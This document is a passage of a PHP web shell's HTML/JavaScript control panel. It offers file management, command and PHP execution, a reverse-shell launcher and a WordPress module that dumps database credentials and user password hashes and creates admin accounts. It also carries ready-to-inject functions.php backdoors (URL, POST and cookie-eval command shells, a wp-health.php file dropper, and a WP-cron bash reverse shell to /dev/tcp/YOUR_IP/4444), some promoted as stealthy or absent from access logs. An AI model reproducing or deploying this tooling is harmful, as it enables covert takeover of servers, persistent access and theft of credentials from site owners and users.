<button class="btn" onclick="wpBdPreset('cookie')" style="font-size:9px" title="Cookie: curl -b 'wx_c=BASE64(phpcode)' URL">🍪 Cookie Eval</button>
<button class="btn" onclick="wpBdPreset('filedrop')" style="font-size:9px" title="Drops /wp-content/uploads/wp-health.php">📥 File Drop</button>
<button class="btn" onclick="wpBdPreset('cron')" style="font-size:9px" title="Rev shell via WP-cron (fill IP/PORT)">⏰ Cron Shell</button>
<button class="btn" onclick="wpBdPreset('info')" style="font-size:9px" title="?wp_info=1 shows phpinfo()">ℹ phpinfo</button>
</div>
<div id="wpBdDesc" style="font-size:9px;color:#555;margin-bottom:6px;padding:4px 6px;background:rgba(255,255,255,.02);border-radius:2px">Select a preset to see usage instructions</div>
<textarea class="fi" id="wpBdCode" rows="7" placeholder="PHP code to inject (without <?php) Example: add_action('wp_head',function(){if(isset($_GET['c']))system(base64_decode($_GET['c']));});" style="resize:vertical"></textarea>
<div style="display:flex;gap:6px;margin-top:6px">
<button class="btn" onclick="wpInjectCode()" style="border-color:var(--rd);color:var(--rd)"><i class="fa fa-syringe"></i> Inject into functions.php</button>
<button class="btn" onclick="document.getElementById('wpBdCode').value='';document.getElementById('wpBdDesc').textContent='Select a preset to see usage'">Clear</button>
</div>
</div>
<div class="tco" id="wpbOut"></div>
</div>
<div class="tco" id="wpScanOut" style="display:none;margin-top:8px;max-height:320px"></div>
</div>
</div>
<!-- LOGS -->
<div class="spanel" id="st-logs">
<div class="tc2 full">
<h3><i class="fa fa-list-alt"></i> LOG VIEWER</h3>
<div style="display:flex;gap:6px;margin-bottom:7px">
<select class="fi" id="logPath" style="flex:1;margin-bottom:0">
<option value="/var/log/apache2/access.log">Apache access.log</option>
<option value="/var/log/apache2/error.log">Apache error.log</option>
<option value="/var/log/nginx/access.log">Nginx access.log</option>
<option value="/var/log/nginx/error.log">Nginx error.log</option>
<option value="/var/log/auth.log">auth.log</option>
<option value="/var/log/syslog">syslog</option>
<option value="/var/log/messages">messages</option>
<option value="custom">Custom path...</option>
</select>
<input class="fi" id="logCustom" placeholder="custom path" style="flex:1;display:none;margin-bottom:0">
<select class="fi" id="logLines" style="width:80px;margin-bottom:0">
<option value="50">50</option>
<option value="100" selected>100</option>
<option value="200">200</option>
<option value="500">500</option>
</select>
<button class="btn" onclick="viewLog()"><i class="fa fa-eye"></i> View</button>
</div>
<div class="tco" style="max-height:350px" id="logOut"></div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- EDITOR OVERLAY -->
<div class="ov" id="edOv">
<div class="mo">
<div class="mor">
<span id="edN" style="color:var(--c2);font-size:11px"></span>
<div style="display:flex;gap:6px;align-items:center">
<span id="edMsg" style="font-size:10px;color:var(--neon)"></span>
<span style="cursor:pointer;color:#333;font-size:18px;line-height:1" onclick="closeOv('edOv')">x</span>
</div>
</div>
<textarea class="ce" id="edC" style="height:430px;width:100%"></textarea>
<div style="margin-top:9px;display:flex;justify-content:flex-end;gap:6px">
<button class="btn" onclick="saveFile()"><i class="fa fa-save"></i> Save</button>
</div>
</div>
</div>
<!-- CHMOD OVERLAY -->
<div class="ov" id="chmodOv">
<div class="mo" style="max-width:340px">
<div class="mor"><h3>CHMOD</h3><span style="cursor:pointer;color:#333;font-size:18px;line-height:1" onclick="closeOv('chmodOv')">x</span></div>
<div style="font-size:11px;color:#555;margin-bottom:8px" id="chmodFile"></div>
<input class="fi" id="chmodVal" value="644" placeholder="e.g. 644, 755, 777">
<div class="fbr" style="margin-top:4px">
<button class="btn" onclick="chmodQuick('644')">644</button>
<button class="btn" onclick="chmodQuick('755')">755</button>
<button class="btn" onclick="chmodQuick('777')">777</button>
<button class="btn" onclick="chmodQuick('400')">400</button>
<button class="btn" onclick="chmodQuick('600')">600</button>
</div>
<div style="margin-top:9px;text-align:right">
<button class="btn" onclick="applyChmod()"><i class="fa fa-check"></i> Apply</button>
</div>
</div>
</div>
<!-- UPLOAD OVERLAY -->
<div class="ov" id="upOv">
<div class="mo" style="max-width:370px;text-align:center">
<div class="mor"><h3>UPLOAD FILE</h3><span style="cursor:pointer;color:#333;font-size:18px;line-height:1" onclick="closeOv('upOv')">x</span></div>
<input type="file" id="upF" style="display:none" onchange="doUpload()">
<button class="btn" style="padding:18px 36px;border-style:dashed;font-size:12px" onclick="document.getElementById('upF').click()">
<i class="fa fa-cloud-upload-alt"></i> Select File
</button>
<div id="upS" style="margin-top:11px;font-size:10px;color:var(--neon)">ready</div>
</div>
</div>
<script>
var _TK='';try{_TK=new URLSearchParams(location.search).get('my1')||'';}catch(_e){}
let CWD='',_HIST=[],_HI=0,_EDF='',_CHMODF='';
function h2s(h){try{const b=new Uint8Array(h.length/2);for(let i=0;i<h.length;i+=2)b[i/2]=parseInt(h.substr(i,2),16);return new TextDecoder('utf-8').decode(b);}catch(_e){let s='';for(let i=0;i<h.length;i+=2)s+=String.fromCharCode(parseInt(h.substr(i,2),16));return s;}}
function s2h(s){try{const b=new TextEncoder().encode(s);return Array.from(b).map(x=>x.toString(16).padStart(2,'0')).join('');}catch(_e){let h='';for(let i=0;i<s.length;i++)h+=s.charCodeAt(i).toString(16).padStart(2,'0');return h;}}
function h2b(h){const b=new Uint8Array(h.length/2);for(let i=0;i<h.length;i+=2)b[i/2]=parseInt(h.substr(i,2),16);return b;}
async function api(t){
const bar=document.getElementById('bar');bar.style.width='65%';
t.d=CWD;t['my1']=_TK;
const j=JSON.stringify(t);let h='';for(let i=0;i<j.length;i++)h+=j.charCodeAt(i).toString(16).padStart(2,'0');
const fd=new FormData();fd.append('n3yqi',h);
try{
const r=await(await fetch('',{method:'POST',body:fd})).json();
bar.style.width='100%';setTimeout(()=>bar.style.width='0',180);return r;
}catch(e){bar.style.width='0';return{ok:false,e:'network'};}
}
function switchTab(el,id){
document.querySelectorAll('.tab').forEach(t=>t.classList.remove('on'));
document.querySelectorAll('.panel').forEach(p=>p.classList.remove('on'));
el.classList.add('on');document.getElementById('p-'+id).classList.add('on');
if(id==='info')loadInfo();
if(id==='tools'){document.querySelector('.stab.on')||stab(document.querySelector('.stab'),'net');}
}
function stab(el,id){
document.querySelectorAll('.stab').forEach(t=>t.classList.remove('on'));
document.querySelectorAll('.spanel').forEach(p=>p.classList.remove('on'));
if(typeof el==='string'){id=el;el=document.querySelector('[onclick*="stab(this,\''+id+'\'"]');}
if(el)el.classList.add('on');
const p=document.getElementById('st-'+id);if(p)p.classList.add('on');
}
// ── FILE MANAGER ─────────────────────────────────────────────────────────────
async function ls(){
const r=await api({a:'ls'});if(!r.ok)return;
CWD=r.cwd;
document.getElementById('hdinfo').textContent=h2s(CWD);
document.getElementById('tp').textContent=h2s(CWD)+' $ ';
let bc='<span onclick="nav(\''+s2h('/')+'\')" style="color:var(--neon)">⌂</span>';
(r.bc||[]).forEach(b=>bc+=`<span class="sep">/</span><span onclick="nav('${b.x}')">${h2s(b.n)}</span>`);
document.getElementById('bc').innerHTML=bc;
let html='';
(r.d||[]).forEach(d=>{
html+=`<tr><td><a href="#" onclick="nav('${d.x}')" style="color:#ddd;text-decoration:none"><i class="fa fa-folder ico" style="color:var(--neon)"></i>${h2s(d.n)}</a></td><td style="color:#1a1a1a">DIR</td><td style="color:#1a1a1a">${d.t}</td><td><span class="badge" onclick="openChmod('${d.n}','${d.p}')" style="cursor:pointer" title="chmod">${d.p}</span></td><td style="text-align:right"><i class="fa fa-pen act" onclick="renF('${d.n}')" style="color:#2a2a2a;cursor:pointer;margin-right:8px"></i><i class="fa fa-trash" onclick="delF('${d.n}')" style="color:var(--rd);cursor:pointer;opacity:.5"></i></td></tr>`;
});
(r.f||[]).forEach(f=>{
let ic='fa-file',cc='#3a3a3a';
if(f.e==='php'){ic='fa-php';cc='#a78bfa';}
else if(['png','jpg','jpeg','gif','webp','svg'].includes(f.e)){ic='fa-image';cc='#f59e0b';}
else if(['txt','log','md','conf','cfg','ini','env','.htaccess'].includes(f.e)){ic='fa-file-alt';cc='#60a5fa';}
else if(['zip','gz','tar','rar','7z'].includes(f.e)){ic='fa-file-archive';cc='#34d399';}
else if(['sh','py','rb','pl','js','ts'].includes(f.e)){ic='fa-file-code';cc='#f87171';}
else if(['sql','db','sqlite'].includes(f.e)){ic='fa-database';cc='#fb923c';}
html+=`<tr><td><i class="fa ${ic} ico" style="color:${cc}"></i>${h2s(f.n)}</td><td style="color:#2a2a2a">${f.s}</td><td style="color:#1a1a1a">${f.t}</td><td><span class="badge" onclick="openChmod('${f.n}','${f.p}')" style="cursor:pointer" title="chmod">${f.p}</span></td><td style="text-align:right"><i class="fa fa-code" onclick="editF('${f.n}')" style="color:#666;cursor:pointer;margin-right:8px" title="Edit"></i><i class="fa fa-download" onclick="dlF('${f.n}')" style="color:var(--c2);cursor:pointer;margin-right:8px;opacity:.7" title="Download"></i><i class="fa fa-pen" onclick="renF('${f.n}')" style="color:#2a2a2a;cursor:pointer;margin-right:8px" title="Rename"></i><i class="fa fa-trash" onclick="delF('${f.n}')" style="color:var(--rd);cursor:pointer;opacity:.5" title="Delete"></i></td></tr>`;
});
document.getElementById('tb').innerHTML=html||'<tr><td colspan="5" style="color:#1a1a1a;text-align:center;padding:28px;font-size:11px">[empty]</td></tr>';
}
function nav(hx){CWD=hx;ls();}
async function delF(hn){if(!confirm('Delete '+h2s(hn)+'?'))return;const r=await api({a:'rm',n:h2s(hn)});r.ok?ls():alert('Error deleting');}
async function renF(hn){const o=h2s(hn);const n=prompt('Rename:',o);if(!n||n===o)return;const r=await api({a:'rn',o,n});r.ok?ls():alert('Error renaming');}
async function mkDir(){const n=prompt('Directory name:');if(!n)return;const r=await api({a:'mk',n});r.ok?ls():alert('Error');}
async function newFile(){const n=prompt('File name:','new_file.txt');if(!n)return;const r=await api({a:'newf',n});r.ok?ls():alert('Error');}
async function editF(hn){
const n=h2s(hn);const r=await api({a:'rd',n});
if(!r.ok){alert('Cannot read: '+n);return;}
document.getElementById('edC').value=h2s(r.c);
document.getElementById('edN').textContent='// '+n;
document.getElementById('edMsg').textContent='';
_EDF=n;showOv('edOv');
}
async function saveFile(){
const c=document.getElementById('edC').value;
const r=await api({a:'wr',n:_EDF,c:s2h(c)});
if(r.ok){document.getElementById('edMsg').textContent='saved ✓';ls();}else alert('Save failed');
}
async function dlF(hn){
const n=h2s(hn);const r=await api({a:'dl',n});
if(!r.ok){alert('Error');return;}
const b=new Blob([h2b(r.c)],{type:'application/octet-stream'});
const a=document.createElement('a');a.href=URL.createObjectURL(b);a.download=h2s(r.n);a.click();
}
function openChmod(hn,perm){_CHMODF=h2s(hn);document.getElementById('chmodFile').textContent=_CHMODF;document.getElementById('chmodVal').value=perm;showOv('chmodOv');}
function chmodQuick(v){document.getElementById('chmodVal').value=v;}
async function applyChmod(){
const m=document.getElementById('chmodVal').value;
const r=await api({a:'chm',n:_CHMODF,m});
if(r.ok){closeOv('chmodOv');ls();}else alert('chmod failed');
}
async function doUpload(){
const file=document.getElementById('upF').files[0];if(!file)return;
let done=0,first=true;document.getElementById('upS').textContent='0%';
while(done<file.size){
const chunk=file.slice(done,done+65536);
const ab=await new Promise(res=>{const fr=new FileReader();fr.onload=e=>res(e.target.result);fr.readAsArrayBuffer(chunk);});
const hex=Array.from(new Uint8Array(ab)).map(b=>b.toString(16).padStart(2,'0')).join('');
await api({a:'up',n:file.name,d:hex,f:first});
done+=65536;first=false;
document.getElementById('upS').textContent=Math.min(100,Math.round(done/file.size*100))+'%';
}
document.getElementById('upS').textContent='done!';
setTimeout(()=>{closeOv('upOv');ls();},700);
}
// ── SHELL ─────────────────────────────────────────────────────────────────────
async function runCmd(cmd){
const to=document.getElementById('to');
to.textContent+='$ '+cmd+'\n';
if(/^cd(\s|$)/.test(cmd)){
const path=cmd.replace(/^cd\s*/,'').trim()||'~';
const r=await api({a:'cd',p:path});
if(r.ok){CWD=r.cwd;document.getElementById('tp').textContent=h2s(CWD)+' $ ';to.textContent+=h2s(CWD)+'\n';}
else to.textContent+='cd: no such directory\n';
}else{
const r=await api({a:'ex',cmd});
if(r.ok){to.textContent+=h2s(r.out)||'';CWD=r.cwd;document.getElementById('tp').textContent=h2s(CWD)+' $ ';}
}
to.scrollTop=to.scrollHeight;
}
function termKd(e){
const el=document.getElementById('tc');
if(e.key==='Enter'){const cmd=el.value.trim();if(!cmd)return;_HIST.unshift(cmd);_HI=0;el.value='';runCmd(cmd);}
else if(e.key==='ArrowUp'){e.preventDefault();if(_HI<_HIST.length)el.value=_HIST[_HI++];}
else if(e.key==='ArrowDown'){e.preventDefault();_HI=Math.max(0,_HI-1);el.value=_HIST[_HI]||'';}
else if(e.ctrlKey&&e.key==='l'){e.preventDefault();document.getElementById('to').textContent='';}
}
// ── PHP ────────────────────────────────────────────────────────────────────────
async function runPHP(){
const code=document.getElementById('phpcode').value;
const r=await api({a:'ev',code});
document.getElementById('phpout').textContent=r.ok?h2s(r.out):'[error]';
}
function clrPHP(){document.getElementById('phpcode').value='';document.getElementById('phpout').textContent='';}
// ── INFO ────────────────────────────────────────────────────────────────────
async function loadInfo(){
const r=await api({a:'info'});
if(!r.ok){document.getElementById('infoC').innerHTML='<div style="color:#222;text-align:center;padding:50px">failed</div>';return;}
const i=r.i;
document.getElementById('infoC').innerHTML=`<div class="ig">
<div class="cd"><h3>SYSTEM</h3>
<div class="kv"><span class="k">OS</span><span class="v">${i.os}</span></div>
<div class="kv"><span class="k">PHP</span><span class="v">${i.php} (${i.sapi})</span></div>
<div class="kv"><span class="k">User</span><span class="v">${i.user}</span></div>
<div class="kv"><span class="k">Server</span><span class="v">${i.srv}</span></div>
<div class="kv"><span class="k">IP:Port</span><span class="v">${i.ip}:${i.port}</span></div>
</div>
<div class="cd"><h3>PATHS</h3>
<div class="kv"><span class="k">CWD</span><span class="v">${i.cwd}</span></div>
<div class="kv"><span class="k">DocRoot</span><span class="v">${i.doc}</span></div>
<div class="kv"><span class="k">Shell</span><span class="v">${h2s(i.file)}</span></div>
</div>
<div class="cd"><h3>RESOURCES</h3>
<div class="kv"><span class="k">Memory</span><span class="v">${i.mem}</span></div>
<div class="kv"><span class="k">Disk Free</span><span class="v">${i.df}</span></div>
<div class="kv"><span class="k">Disk Total</span><span class="v">${i.dt}</span></div>
</div>
<div class="cd" style="grid-column:1/-1"><h3>DISABLED FUNCTIONS</h3>
<div style="font-size:10px;color:${i.disable?'#f87171':'var(--neon)'};line-height:1.8">${i.disable||'(none — fully featured)'}</div>
</div>
<div class="cd" style="grid-column:1/-1"><h3>LOADED EXTENSIONS</h3>
<div style="font-size:10px;color:#2a2a2a;word-break:break-all;line-height:1.9">${i.ext}</div>
</div>
</div>`;
}
// ── TOOLS ─────────────────────────────────────────────────────────────────────
async function net(sub){
const h=document.getElementById('nH').value,p=document.getElementById('nP').value;
const r=await api({a:'net',s:sub,h,u:h,p});
document.getElementById('netOut').textContent=h2s(r.out||'');
}
async function pe(sub){
const r=await api({a:'pe',s:sub});
document.getElementById('peOut').textContent=h2s(r.out||'');
}
async function genRS(run){
if(run&&!confirm('Execute reverse shell on target?'))return;
const ip=document.getElementById('rsIp').value,port=document.getElementById('rsPort').value,t=document.getElementById('rsType').value;
const r=await api({a:'rs',ip,port,t,run:!!run});
document.getElementById('rsOut').textContent=h2s(r.cmd||'');
}
let _psRaw='';
async function runPs(){
const r=await api({a:'ps'});_psRaw=h2s(r.out||'');
document.getElementById('psOut').textContent=_psRaw;filterPs();
}
function filterPs(){
const f=document.getElementById('psFilter').value.toLowerCase();
if(!f){document.getElementById('psOut').textContent=_psRaw;return;}
document.getElementById('psOut').textContent=_psRaw.split('\n').filter(l=>l.toLowerCase().includes(f)).join('\n');
}
async function runEnc(){
const m=document.getElementById('encMode').value;
const d=document.getElementById('encIn').value;
const r=await api({a:'enc',m,d:s2h(d)});
document.getElementById('encOut').value=r.ok?h2s(r.out):'[error]';
}
function swapEnc(){
const i=document.getElementById('encIn'),o=document.getElementById('encOut');
const tmp=i.value;i.value=o.value;o.value=tmp;
}
async function runGrep(rec){
const pat=document.getElementById('srchPat').value;
const dir=document.getElementById('srchDir').value||h2s(CWD);
const cs=document.getElementById('srchCS').checked;
const r=await api({a:'grep',pat,dir,rec,cs});
document.getElementById('srchOut').textContent=h2s(r.out||'(no results)');
}
async function runFind(type){
const pat=document.getElementById('srchPat').value||'*';
const dir=document.getElementById('srchDir').value||h2s(CWD);
const r=await api({a:'fnd',pat,dir,t:type});
document.getElementById('srchOut').textContent=h2s(r.out||'(no results)');
}
async function runArc(sub){
const name=document.getElementById('arcName').value;
const target=document.getElementById('arcTarget').value||'.';
const file=document.getElementById('arcFile').value;
const r=await api({a:'arc',s:sub,name,target,f:file});
document.getElementById('arcOut').textContent=h2s(r.out||'');
}
// ── WORDPRESS MODULE ──────────────────────────────────────────────────────────
var _wpRoot='',_wpPrefix='wp_';
function wpPfx(){return _wpPrefix;}
function wpTab(el,id){
document.querySelectorAll('.wptab').forEach(t=>t.classList.remove('on'));
document.querySelectorAll('.wpsub').forEach(p=>p.classList.remove('on'));
el.classList.add('on');const p=document.getElementById('wps-'+id);if(p)p.classList.add('on');
}
async function wpDetect(){
const r=await api({a:'wp',s:'find'});
if(r.root){_wpRoot=r.root;document.getElementById('wpRootPath').textContent=h2s(r.root);}
else document.getElementById('wpRootPath').textContent='Not found — navigate to WP directory';
}
async function wpGetInfo(){
if(!_wpRoot)await wpDetect();
if(!_wpRoot){document.getElementById('wpiOut').textContent='WP root not found';return;}
const r=await api({a:'wp',s:'sysinfo'});
if(!r.ok){document.getElementById('wpiOut').textContent=r.e||'Error';return;}
document.getElementById('wpVersion').textContent='v'+r.version;
document.getElementById('wpiOut').textContent='Version: '+r.version+'\nRoot: '+h2s(r.root||'')+'\nSite URL: '+h2s(r.siteurl||'')+'\nWP_DEBUG: '+r.debug+'\nFile Editing: '+r.file_edit;
}
async function wpS(sub,extra){
if(!_wpRoot)await wpDetect();
if(!_wpRoot){alert('WordPress not found. Navigate to WP directory first.');return;}
const r=await api(Object.assign({a:'wp',s:sub},extra||{}));
if(sub==='creds'){
if(!r.ok){document.getElementById('wpiOut').textContent=r.e||'Error';return;}
let out='=== DATABASE ===\n';Object.entries(r.db||{}).forEach(([k,v])=>out+=k+': '+v+'\n');
out+='\nWP Root: '+h2s(r.root||'')+'\nWP Version: '+(r.version||'?');
document.getElementById('wpiOut').textContent=out;
}else if(sub==='uploads'||sub==='recent'){
document.getElementById('wpfOut').textContent=h2s(r.out||'');
}else if(sub==='scan'){
const el=document.getElementById('wpScanOut');el.style.display='block';el.textContent=h2s(r.out||'');
}
return r;
}
async function wpGetOpts(){
if(!_wpRoot)await wpDetect();
const keys=document.getElementById('wpOptKeys').value;
const r=await api({a:'wp',s:'opts',keys:keys});
if(!r.ok){document.getElementById('wpiOut').textContent=r.e||'Error';return;}
let out='=== WP OPTIONS ===\n';Object.entries(r.opts||{}).forEach(([k,v])=>out+=k+': '+v+'\n');
document.getElementById('wpiOut').textContent=out;
}
async function wpSetOpt(){
if(!_wpRoot)await wpDetect();
const key=document.getElementById('wpOptKey').value,val=document.getElementById('wpOptVal').value;
if(!key)return alert('Enter option name');
const r=await api({a:'wp',s:'setopt',key,val});
document.getElementById('wpiOut').textContent=r.ok?'Option updated: '+key+' = '+val:(r.e||'Error');
}
async function wpRunSql(){
if(!_wpRoot)await wpDetect();
const sql=document.getElementById('wpSql').value;if(!sql)return;
const r=await api({a:'wp',s:'dbq',sql});
if(r.ok){document.getElementById('wpdOut').textContent=h2s(r.out||'');if(r.count!==undefined)document.getElementById('wpDbCount').textContent=r.count+' rows';}
else document.getElementById('wpdOut').textContent='ERROR: '+(r.e||'unknown');
}
function wpDbQ(sql){document.getElementById('wpSql').value=sql.replace(/'/g,"'");wpRunSql();}
async function wpListUsers(){
if(!_wpRoot)await wpDetect();
const r=await api({a:'wp',s:'users'});
if(!r.ok){document.getElementById('wpuOut').textContent=r.e||'Error';return;}
let html='<table style="width:100%;border-collapse:collapse;font-size:10px"><tr style="color:#444"><th style="text-align:left;padding:3px 6px">ID</th><th style="text-align:left;padding:3px 6px">Login</th><th style="text-align:left;padding:3px 6px">Email</th><th style="text-align:left;padding:3px 6px">Role</th><th style="text-align:left;padding:3px 6px">Hash(20)</th></tr>';
(r.users||[]).forEach(u=>{const role=u.role;const rc=role==='administrator'?'color:var(--rd)':role==='editor'?'color:#f59e0b':'color:#555';html+=`<tr style="border-bottom:1px solid var(--bd)"><td style="padding:3px 6px;color:#555">${u.id}</td><td style="padding:3px 6px;color:#fff">${h2s(u.login)}</td><td style="padding:3px 6px;color:#888">${h2s(u.email)}</td><td style="padding:3px 6px;${rc}">${u.role}</td><td style="padding:3px 6px;color:#333;font-size:9px">${h2s(u.hash)}...</td></tr>`;});
html+='</table>';document.getElementById('wpUserList').innerHTML=html;
}
async function wpAddUser(){
if(!_wpRoot)await wpDetect();
const login=document.getElementById('wpNewLogin').value||'px5admin';
const pass=document.getElementById('wpNewPass').value;
const email=document.getElementById('wpNewEmail').value;
const r=await api({a:'wp',s:'adduser',login,pass,email});
if(r.ok)document.getElementById('wpuOut').textContent='SUCCESS! User created:\nID: '+r.id+'\nLogin: '+h2s(r.login)+'\nPassword: '+h2s(r.pass)+'\n\nLogin at: '+h2s(_wpRoot)+'/wp-admin/';
else document.getElementById('wpuOut').textContent='FAILED: '+(r.e||'unknown error');
}
async function wpChPwd(){
if(!_wpRoot)await wpDetect();
const login=document.getElementById('wpChPwdLogin').value,pass=document.getElementById('wpChPwdPass').value;
if(!login||!pass)return alert('Fill login and password');
const r=await api({a:'wp',s:'chpwd',login,pass});
document.getElementById('wpuOut').textContent=r.ok&&r.affected>0?'Password changed for: '+login:'Failed (user not found or error)';
}
async function wpListPlugins(){
if(!_wpRoot)await wpDetect();
const r=await api({a:'wp',s:'plugins'});
if(!r.ok){document.getElementById('wppOut').textContent=r.e||'Error';return;}
let html='';
(r.plugins||[]).forEach(p=>{
const ac=p.active;const slug=p.name+'/'+p.name+'.php';
html+=`<div style="display:flex;gap:8px;align-items:center;padding:4px 0;border-bottom:1px solid var(--bd);font-size:10px">
<span style="color:${ac?'var(--neon)':'#333'}">${ac?'●':'○'}</span>
<span style="flex:1;color:${ac?'#ccc':'#555'}">${p.name}</span>
<button class="btn" style="font-size:9px;padding:2px 6px" onclick="wpTogglePlugin('${p.name}',${ac})">${ac?'Deactivate':'Activate'}</button>
</div>`;
});
document.getElementById('wpPluginList').innerHTML=html||'<span style="color:#333;font-size:10px">No plugins found</span>';
}
async function wpTogglePlugin(name,isActive){
if(!_wpRoot)await wpDetect();
const sub=isActive?'deactplg':'actplg';const slug=name+'/'+name+'.php';
const r=await api({a:'wp',s:sub,plg:slug});
document.getElementById('wppOut').textContent=r.ok?(isActive?'Deactivated':'Activated')+': '+name:'Error: '+(r.e||'unknown');
wpListPlugins();
}
async function wpListThemes(){
if(!_wpRoot)await wpDetect();
const r=await api({a:'wp',s:'themes'});
if(!r.ok){document.getElementById('wptOut').textContent=r.e||'Error';return;}
const cur=h2s(r.current||'');
let html='';
(r.themes||[]).forEach(t=>{html+=`<div style="padding:4px 0;border-bottom:1px solid var(--bd);font-size:10px;display:flex;gap:8px;align-items:center"><span style="color:${t.active?'var(--neon)':'#333'}">${t.active?'●':'○'}</span><span style="color:${t.active?'#ccc':'#555'};flex:1">${t.name}</span>${t.active?'<span style="font-size:9px;color:var(--neon)">(active)</span>':''}</div>`;});
document.getElementById('wpThemeList').innerHTML=html;
document.getElementById('wptOut').textContent='Active theme: '+cur;
}
async function wpRecentFiles(days){
if(!_wpRoot)await wpDetect();
const r=await api({a:'wp',s:'recent',days});
document.getElementById('wpfOut').textContent=h2s(r.out||'(none)');
}
const _wpBdPresets={
'cmd':{desc:`URL CMD shell (Base64-encoded commands)\nAccess: site.com/?wp_debug=cmd&cmd=BASE64(whoami)\nGenerate base64: echo -n "whoami" | base64\nOutput returned as plain text.`,code:"// CMD shell - ?wp_debug=cmd&cmd=BASE64(command)\nadd_action('init',function(){if(isset($_GET['wp_debug'])&&$_GET['wp_debug']==='cmd'&&isset($_GET['cmd'])){ob_clean();header('Content-Type:text/plain;charset=utf-8');echo shell_exec(base64_decode($_GET['cmd']));die();}},1);"},
'post':{desc:`POST shell (command not in URL/access logs)\nAccess: curl -X POST site.com/ --data c=BASE64(id)\nWorks on ANY WordPress page.`,code:"// POST shell - no cmd in access logs\n// curl -X POST https://site.com/ --data 'c=BASE64(whoami)'\nadd_action('init',function(){if(isset($_POST['c'])&&strlen($_POST['c'])>4){ob_clean();header('Content-Type:text/plain;charset=utf-8');echo shell_exec(base64_decode($_POST['c']));die();}},1);"},
'cookie':{desc:`Cookie eval (most stealthy - nothing in URL or POST)\nEncode PHP as base64, send as cookie wx_c\nLinux: B=$(echo -n "system(id);" | base64); curl -b "wx_c=$B" https://site.com/\nFires on EVERY page load silently.`,code:"// Cookie eval - most stealthy\n// curl -b 'wx_c=BASE64_PHP_CODE' https://site.com/\nadd_action('wp_footer',function(){if(isset($_COOKIE['wx_c'])&&strlen($_COOKIE['wx_c'])>8){@eval(base64_decode($_COOKIE['wx_c']));}},9999);"},
'filedrop':{desc:`Drops a PHP shell into /wp-content/uploads/\nFile created on first page visit after injection\nAccess: site.com/wp-content/uploads/wp-health.php?c=BASE64(id)\nSurvives theme changes and plugin deactivation.`,code:"// Drops /wp-content/uploads/wp-health.php\n// Access: /wp-content/uploads/wp-health.php?c=BASE64(whoami)\nadd_action('init',function(){$f=ABSPATH.'wp-content/uploads/wp-health.php';if(!file_exists($f)){file_put_contents($f,'<'.'?php if(isset($_REQUEST[\"c\"])){@ob_clean();@header(\"Content-Type:text/plain\");echo shell_exec(base64_decode($_REQUEST[\"c\"]));} ?'.'>');}},1);"},
'cron':{desc:`Reverse shell via WP-Cron - EDIT IP AND PORT FIRST!\nListener: nc -lvnp 4444\nTrigger: visit any page or site.com/wp-cron.php?doing_wp_cron\nFires once as scheduled event ~5 sec after first page load.`,code:"// EDIT YOUR_IP AND PORT before injecting!\nadd_action('init',function(){if(!wp_next_scheduled('px5_s')){wp_schedule_single_event(time()+5,'px5_s');}});\nadd_action('px5_s',function(){shell_exec('bash -c \\'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1\\' &');});"},
'info':{desc:`phpinfo() via URL param (quick server recon)\nAccess: site.com/?wp_info=1\nShows PHP version, extensions, env vars, server config.`,code:"// phpinfo() - access: /?wp_info=1\nadd_action('init',function(){if(isset($_GET['wp_info'])&&$_GET['wp_info']==='1'){ob_clean();phpinfo();die();}},1);"}
};
function wpBdPreset(t){
const p=_wpBdPresets[t];if(!p)return;
document.getElementById('wpBdDesc').textContent=p.desc;
document.getElementById('wpBdCode').value=p.code;
}
async function wpInjectCode(){
if(!_wpRoot)await wpDetect();
const code=document.getElementById('wpBdCode').value;
if(!code)return alert('Enter code to inject');
if(!confirm('Inject PHP code into active theme functions.php?'))return;
const r=await api({a:'wp',s:'backdoor',code:s2h(code)});
if(r.ok)document.getElementById('wpbOut').textContent='Injected into: '+h2s(r.file||'')+'\nTheme: '+h2s(r.theme||'');
else document.getElementById('wpbOut').textContent='FAILED: '+(r.e||'unknown');
}
function viewLog(){
const sel=document.getElementById('logPath');
const path=sel.value==='custom'?document.getElementById('logCustom').value:sel.value;
const n=document.getElementById('logLines').value;
api({a:'log',l:path,n}).then(r=>document.getElementById('logOut').textContent=h2s(r.out||'(empty or not found)'));
}
document.getElementById('logPath').addEventListener('change',function(){
document.getElementById('logCustom').style.display=this.value==='custom'?'block':'none';
});
// ── OVERLAYS ──────────────────────────────────────────────────────────────────
function showOv(id){document.getElementById(id).classList.add('on');}
function closeOv(id){document.getElementById(id).classList.remove('on');}
document.addEventListener('keydown',e=>{
if(e.key==='Escape')document.querySelectorAll('.ov.on').forEach(o=>o.classList.remove('on'));
if(e.ctrlKey&&e.shiftKey&&e.key==='P'){e.preventDefault();document.querySelector('[onclick*="term"]')&&switchTab(document.querySelector('[onclick*="term"]'),'term');document.getElementById('tc').focus();}
});
// ── INIT ──────────────────────────────────────────────────────────────────────
(async function(){const r=await api({a:'ping'});if(r.cwd)CWD=r.cwd;ls();})();
</script>
</body>
</html>